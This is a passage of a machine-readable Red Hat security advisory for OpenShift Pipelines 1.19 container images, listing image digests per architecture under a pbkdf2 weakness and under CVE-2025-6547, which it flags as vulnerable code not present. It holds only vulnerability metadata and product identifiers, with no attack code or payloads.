"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pbkdf2: pbkdf2 silently returns predictable key material"
},
{
"cve": "CVE-2025-6547",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2025-06-23T20:01:13.559691+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
